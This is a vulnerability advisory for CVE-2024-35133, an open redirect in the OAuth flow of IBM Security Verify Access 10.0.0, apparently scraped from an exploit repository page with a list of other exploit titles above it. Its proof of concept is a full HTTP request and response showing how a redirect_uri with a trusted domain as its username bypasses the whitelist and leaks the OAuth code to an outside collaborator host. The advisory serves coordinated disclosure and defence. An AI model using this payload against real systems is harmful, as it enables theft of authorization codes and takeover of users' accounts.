
52 changes to exploits/shellcodes/ghdb Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) DataEase 2.4.0 - Database Configuration Information Exposure Cosy+ firmware 21.2s7 - Command Injection Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated) ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 - File Disclosure ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover CyberPanel 2.3.6 - Remote Code Execution (RCE) IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MagnusSolution magnusbilling 7.3.0 - Command Injection Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass Sonatype Nexus Repository 3.53.0-01 - Path Traversal Watcharr 1.43.0 - Remote Code Execution (RCE) Webmin Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials ABB Cylon Aspect 3.08.01 - Arbitrary File Delete AquilaCMS 1.409.20 - Remote Command Execution (RCE) Artica Proxy 4.50 - Remote Code Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) CodeCanyon RISE CRM 3.7.0 - SQL Injection Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Feng Office 3.11.1.2 - SQL Injection flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload flatCore 1.5 - Cross Site Request Forgery (CSRF) flatCore 1.5.5 - Arbitrary File Upload GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) Gnuboard5 5.3.2.8 - SQL Injection LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection Litespeed Cache 6.5.0.1 - Authentication Bypass MiniCMS 1.1 - Cross Site Scripting (XSS) MoziloCMS 3.0 - Remote Code Execution (RCE) NEWS-BUZZ News Management System 1.0 - SQL Injection PandoraFMS 7.0NG.772 - SQL Injection phpIPAM 1.6 - Reflected Cross Site Scripting (XSS) PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) RosarioSIS 7.6 - SQL Injection Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) X2CRM 8.5 - Stored Cross-Site Scripting (XSS) Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
181 lines
No EOL
6.9 KiB
Text
181 lines
No EOL
6.9 KiB
Text
# Exploit Title : IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow
|
|
======== < Table of Contents > ================================================
|
|
|
|
0. Overview
|
|
1. Detailed Description
|
|
2. Proof Of Concept
|
|
3. Solution
|
|
4. Disclosure Timeline
|
|
5. References
|
|
6. Credits
|
|
7. Legal Notices
|
|
|
|
======== < 0. Overview > ======================================================
|
|
|
|
Revision:
|
|
1.0
|
|
|
|
Impact:
|
|
By persuading a victim to visit a specially crafted Web site, a remote
|
|
attacker could exploit this vulnerability to spoof the URL displayed
|
|
to redirect a user to a malicious Web site that would appear to be
|
|
trusted. This could allow the attacker to obtain highly sensitive
|
|
information or conduct further attacks against the victim.
|
|
|
|
Severity:
|
|
NIST: High
|
|
IBM: Medium
|
|
|
|
CVSS Score:
|
|
NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
|
|
IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)
|
|
|
|
CVE-ID:
|
|
CVE-2024-35133
|
|
|
|
Vendor:
|
|
IBM
|
|
|
|
Affected Products:
|
|
IBM Security Verify Access
|
|
IBM Security Verify Access Docker
|
|
|
|
Affected Versions:
|
|
10.0.0 - 10.0.8
|
|
|
|
Product Description:
|
|
|
|
IBM Security Verify Access is a complete authorization and network
|
|
security policy management solution. It provides end-to-end protection
|
|
of resources over geographically dispersed intranets and extranets.
|
|
|
|
In addition to state-of-the-art security policy management, IBM Security
|
|
Verify Access provides authentication, authorization, data security, and
|
|
centralized resource management capabilities.
|
|
|
|
IBM Security Verify Access offers the following features:
|
|
Authentication ~ Provides a wide range of built-in authenticators and
|
|
supports external authenticators.
|
|
|
|
Authorization ~ Provides permit and deny decisions for protected resources
|
|
requests in the secure domain through the authorization API.
|
|
|
|
Data security and centralized resource management ~ Manages secure access
|
|
to private internal network-based resources by using the public Internet's
|
|
broad connectivity and ease of use with a corporate firewall system.
|
|
|
|
======== < 1. Detailed Description > ==========================================
|
|
|
|
During a Penetration Test of the OAuth flow for a client, it was found an
|
|
Open Redirect vulnerability that can led to the leakage of the OAuth "code" variable.
|
|
|
|
It was possible to bypass the parser's logic responsible for verifying the
|
|
correctness and the validity of the "redirect_uri" parameter during an OAuth
|
|
flow by leveraging RFC 3986 (3.2.1) providing a username and password directly
|
|
in the Uniform Resource Identifier (URI).
|
|
|
|
By providing as the "username" field a legitimate and expected domain, it
|
|
was possible to bypass the whitelist filter used by "IBM Security Verify Access"
|
|
and cause an Open Redirect to any arbitrary domain controlled by the attacker,
|
|
not only altering the expected flow and redirect a user to a malicious
|
|
Web site that would appear to be trusted.
|
|
|
|
This could allow the attacker to obtain highly sensitive like the OAuth "code"
|
|
token or conduct further attacks against the victim
|
|
|
|
======== < 2. Proof of Concepts > =============================================
|
|
|
|
===== REQUEST =====
|
|
|
|
[[
|
|
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
|
|
Host: [REDACTED]
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate, br
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
Te: trailers
|
|
Connection: close
|
|
]]
|
|
|
|
===== RESPONSE =====
|
|
|
|
[[
|
|
HTTP/1.1 302 Found
|
|
content-language: en-US
|
|
date: Tue, 19 Mar 2024 16:04:35 GMT
|
|
location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
|
|
p3p: CP="NON CUR OTPi OUR NOR UNI"
|
|
x-frame-options: DENY
|
|
x-content-type-options: nosniff
|
|
cache-control: no-store
|
|
x-xss-protection: 1; mode=block
|
|
x-permitted-cross-domain-policies: none
|
|
cross-origin-resource-policy: same-site
|
|
content-security-policy: frame-ancestors 'none'
|
|
referrer-policy: no-referrer-when-downgrade
|
|
strict-transport-security: max-age=31536000; includeSubDomains
|
|
pragma: no-cache
|
|
Content-Length: 0.
|
|
]]
|
|
|
|
======== < 3. Solution > ======================================================
|
|
|
|
Refer to IBM Security Bulletin 7166712 for patch, upgrade or
|
|
suggested workaround information.
|
|
|
|
See "References" for more details.
|
|
|
|
======== < 4. Disclosure Timeline > ===========================================
|
|
|
|
19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
|
|
21/03/2024 - Vulnerability shared with the client who committed the
|
|
Penetration Test on his infrastructure, relying on IBM SVA
|
|
02/04/2024 - Vulnerability shared with IBM
|
|
02/04/2024 - Vulnerability taken over by IBM
|
|
14/05/2024 - Vulnerability confirmed by IBM
|
|
18/07/2024 - Pre-release provided by IBM to the customer to verify the
|
|
resolution of the vulnerability
|
|
27/08/2024 - Security Bulletin and vulnerability shared by IBM
|
|
|
|
======== < 5. References > ====================================================
|
|
|
|
(1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
|
|
(2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026
|
|
(3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133
|
|
(4) https://cwe.mitre.org/data/definitions/178.html
|
|
|
|
======== < 6. Credits > =======================================================
|
|
|
|
This vulnerability was discovered and reported by:
|
|
|
|
Giulio Garzia 'Ozozuz'
|
|
|
|
Contacts:
|
|
|
|
https://www.linkedin.com/in/giuliogarzia/
|
|
https://github.com/Ozozuz
|
|
|
|
======== < 7. Legal Notices > ================================================
|
|
|
|
Copyright (c) 2024 Giulio Garzia "Ozozuz"
|
|
|
|
Permission is granted for the redistribution of this alert
|
|
electronically. It may not be edited in any way without mine express
|
|
written consent. If you wish to reprint the whole or any
|
|
part of this alert in any other medium other than electronically,
|
|
please email me for permission.
|
|
|
|
Disclaimer: The information in the advisory is believed to be accurate
|
|
at the time of publishing based on currently available information.
|
|
Use of the information constitutes acceptance for use in an AS IS
|
|
condition.
|
|
There are no warranties with regard to this information. Neither the
|
|
author nor the publisher accepts any liability for any direct,
|
|
indirect, or consequential loss or damage arising from use of,
|
|
or reliance on,this information. |